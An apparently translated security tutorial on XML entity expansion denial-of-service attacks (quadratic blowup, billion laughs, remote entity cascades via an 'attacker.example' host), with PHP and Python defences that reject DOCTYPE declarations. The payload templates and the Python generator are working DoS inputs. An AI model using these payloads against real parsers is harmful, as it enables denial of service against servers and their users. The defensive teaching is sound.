2025-03-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
The editor shares here a worked analysis of XML entity expansion attacks. Most people know little about them, so the article is offered for reference; I hope you learn a lot from reading it.
XML Entity Expansion is somewhat similar to XML External Entity injection (XXE), but its main goal is a denial of service (DoS): it tries to exhaust the resources of the target application's server environment. The attack is built on ordinary XML entity expansion. A custom entity is defined in the XML's DOCTYPE in such a way that, for example, the parser generates an in-memory XML structure far larger than the size of the original XML would suggest, consuming the memory the web server needs to keep running efficiently. The attack also applies to the XML serialisation of HTML5, which the libxml2 extension does not currently recognise as HTML.
Examples of XML Entity Expansion
There are several ways of expanding custom XML entities so as to exhaust server resources.
Generic Entity Expansion (generic entity expansion attack)
A generic entity expansion attack is also called a Quadratic Blowup Attack. A custom entity is defined as an extremely long string. Each of the many references to it in the document body is expanded in full, so the in-memory XML structure becomes far larger than the original document would suggest: the expanded size is the product of the entity length and the reference count, which is why the attack is called quadratic.
    <?xml version="1.0"?>
    <!DOCTYPE results [
        <!-- placeholder: the entity value is a string of many kilobytes -->
        <!ENTITY long "SOME_SUPER_LONG_STRING">
    ]>
    <results>
        <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result>
        <result>&long;&long;&long;&long;&long;&long;&long;
        &long;&long;&long;&long;&long;&long;&long;
        Keep it going...
        &long;&long;&long;&long;&long;&long;&long;...</result>
    </results>
By balancing the length of the custom entity string against the number of times it is referenced in the document body, an XML document or string can be crafted that expands to a predictable fraction of the server's RAM. Repeating such requests so that several of them occupy the server's RAM at once is a successful denial of service attack. The drawback of this approach is that, because the memory consumption is the result of simple multiplication, the initial XML document or string must itself be fairly large.
Recursive entity extension attack
A generic entity expansion attack needs a large enough amount of XML input, whereas a recursive entity expansion attack produces a far stronger effect from a much smaller input. It relies on the XML parser to resolve a small set of entities that reference one another, so that the expansion grows exponentially. Through this explosive growth, an input far smaller than that of a generic expansion attack expands enormously, which is why the technique is also called an "XML Bomb" or the "Billion Laughs Attack".
    <?xml version="1.0"?>
    <!DOCTYPE results [
        <!-- placeholder value for x0; every level doubles the previous one -->
        <!ENTITY x0 "BOOM!">
        <!ENTITY x1 "&x0;&x0;">
        <!ENTITY x2 "&x1;&x1;">
        <!ENTITY x3 "&x2;&x2;">
        <!-- continue the sequence x4 ... x98 in the same way -->
        <!ENTITY x99 "&x98;&x98;">
        <!ENTITY boom "&x99;&x99;">
    ]>
    <results>
        <result>Explode in 3...2...1...&boom;</result>
    </results>
An XML Bomb does not require a large XML input, which an application may restrict. The entity set grows exponentially: the text that results from the example above is 2^100 times the size of the original &x0; entity value. That is a genuinely huge and devastating bomb.
Remote entity extension attack
Both the generic and the recursive entity expansion attacks rely on entities defined locally in the XML document type definition, but an attacker can also define external entities. This obviously requires that the XML parser be allowed to make remote HTTP requests, as we saw earlier when describing XML External Entity injection (XXE). Refusing such requests is a basic security measure for any XML parser, so the defences against XXE also apply to this kind of entity expansion attack.
Where that defence is absent, a remote entity expansion attack works by making the XML parser issue a remote HTTP request to fetch the expansion value of the referenced entity. The returned result can itself define further external entities that the parser must fetch with separate HTTP requests. In this way a seemingly harmless request quickly spirals out of control and drains the resources available to the server, and if the fetched content also contains a recursive expansion attack, the result is worse still.
    <?xml version="1.0"?>
    <!DOCTYPE results [
        <!-- placeholder URL: an attacker-controlled host that serves further entity definitions -->
        <!ENTITY cascade SYSTEM "http://attacker.example/entity1.xml">
    ]>
    <results>
        <result>3..2..1...&cascade;</result>
    </results>
These attacks can also take a more circuitous route to DoS, for example by pointing the remote requests at the local application itself or at any other application that shares its server resources. That makes a self-inflicted DoS possible: the XML parser's attempts to resolve external entities may trigger many requests against the local application, consuming yet more server resources. The same approach can be used to amplify the effect of the DoS attacks built on XML External Entity injection (XXE) discussed earlier.
Defensive measures against XML entity extension attacks
The following general defences are inherited from our defences against ordinary XML External Entity (XXE) attacks. The loading of local files and the making of remote HTTP requests on behalf of custom entities must be refused, using the following function, which applies globally to every PHP extension that uses libxml2 internally:
    libxml_disable_entity_loader(true);
True to form, PHP tends to go against the grain and does not offer the conventional defence, a parser option that rejects document type declarations outright and thereby rejects custom entity definitions entirely. PHP does define the LIBXML_NOENT constant and the DOMDocument::$substituteEntities public property, but despite their names these turn entity substitution on rather than off, so they are no defence at all. There is no better option, so we have to solve the problem ourselves.
Although there is no better solution, libxml2 does reject recursive entity resolution by default (a recursive entity lights up the error log like a Christmas tree), so no special defence against recursive entities appears necessary, though we should still do something in case libxml2 ever regresses on that point.
The main current threat is therefore the cruder Generic Entity Expansion, or Quadratic Blowup, attack. It needs neither remote nor local system calls and no actual recursion. In practice the only defence is either not to use XML at all, or to sanitise all XML and reject any document that contains a document type declaration. Unless the document type declaration comes from a trusted source, such as a peer-verified HTTPS connection, the safest course is not to use XML. Otherwise, since PHP gives us no option to disable document type definitions, we must build the logic ourselves. Assuming libxml_disable_entity_loader(TRUE) has been called, it is safe to run the following check immediately after loading, because entity expansion is deferred until the node values affected by it are accessed, and the check never accesses them:
    $dom = new DOMDocument;
    $dom->loadXML($xml);
    // Walk the top-level nodes only; the DOCTYPE, if present, is one of them.
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new \InvalidArgumentException(
                'Invalid XML: Detected use of illegal DOCTYPE'
            );
        }
    }
Of course, the code above only works properly if libxml_disable_entity_loader has been set to TRUE, so that external entity references are not resolved when the XML is first loaded. Note that libxml_disable_entity_loader() is deprecated as of PHP 8.0 because libxml 2.9.0 and later disable external entity loading by default; on those versions the check works without the call. Unless the parser itself offers a comprehensive set of options for controlling entity resolution, this is probably the only defence, and it is also the one to use when the XML parser does not rely on libxml2.
If you want to use SimpleXML, remember to use simplexml_import_dom() to convert the verified DOMDocument object rather than loading the raw XML a second time.
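The two local payload shapes (generic and recursive expansion) and the DOCTYPE check above, as an added example that is not part of the original article and is not PHP or libxml2 code: the Python script below builds a quadratic-blowup document and a recursive (billion laughs) document using the entity names from the article, reports how far each would expand, and then refuses both before any expansion happens by aborting an expat parse inside the DOCTYPE-declaration callback. The function names and the `results`/`result` wrapper elements are assumptions of this example.

```python
"""Entity-expansion payloads and a parse-time DOCTYPE rejection.

Added example for this article, not code from the page or from PHP/libxml2.
Entity names (long, x0..xN, boom) follow the article; the function names and
the <results>/<result> wrapper elements are assumptions of this example.
"""
import xml.parsers.expat


def quadratic_blowup(entity_len, refs):
    """Generic entity expansion: one long entity referenced `refs` times.

    Returns (document, expanded_size). The attacker sends roughly
    entity_len + 6 * refs bytes; the parser materialises entity_len * refs.
    """
    payload = "A" * entity_len  # stands in for SOME_SUPER_LONG_STRING
    doc = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE results [\n"
        f'  <!ENTITY long "{payload}">\n'
        "]>\n"
        "<results><result>" + "&long;" * refs + "</result></results>\n"
    )
    return doc, entity_len * refs


def billion_laughs(depth, base="BOOM!"):
    """Recursive entity expansion: x1 = two x0, x2 = two x1, ..., boom = two x(depth-1).

    Returns (document, expanded_size). &boom; expands to 2**depth copies of
    `base` although the document itself grows only linearly with `depth`.
    """
    defs = [f'  <!ENTITY x0 "{base}">']
    for i in range(1, depth):
        defs.append(f'  <!ENTITY x{i} "&x{i - 1};&x{i - 1};">')
    defs.append(f'  <!ENTITY boom "&x{depth - 1};&x{depth - 1};">')
    doc = (
        '<?xml version="1.0"?>\n<!DOCTYPE results [\n'
        + "\n".join(defs)
        + "\n]>\n<results><result>Explode in 3...2...1...&boom;</result></results>\n"
    )
    return doc, (2 ** depth) * len(base)


class DoctypeRejected(ValueError):
    """Raised when the input carries a document type declaration."""


def parse_rejecting_doctype(xml_text):
    """Stream-parse `xml_text` with expat, aborting the moment a DOCTYPE starts.

    expat reports the DOCTYPE before it reads the internal subset or resolves
    any entity reference in the body, so a malicious document is refused at a
    cost proportional to its input size, never its expanded size. Returns the
    element names seen, in document order.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("Invalid XML: detected use of illegal DOCTYPE")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(xml_text, True)
    return seen


if __name__ == "__main__":
    quad, quad_size = quadratic_blowup(entity_len=10_000, refs=1_000)
    print(f"quadratic: {len(quad)} bytes in -> {quad_size} bytes expanded")
    bomb, bomb_size = billion_laughs(depth=100)
    print(f"recursive: {len(bomb)} bytes in -> {bomb_size} bytes expanded")
    clean = "<results><result>ok</result></results>"  # constructed benign input
    for label, doc in (("quadratic", quad), ("recursive", bomb), ("clean", clean)):
        try:
            print(label, "accepted, elements:", parse_rejecting_doctype(doc))
        except DoctypeRejected as exc:
            print(label, "rejected:", exc)
```

The rejection happens in the DOCTYPE callback rather than after a full parse, which is the property the PHP check above relies on as well: the decision must be made before any entity value is materialised, otherwise the check itself pays for the expansion it is trying to prevent.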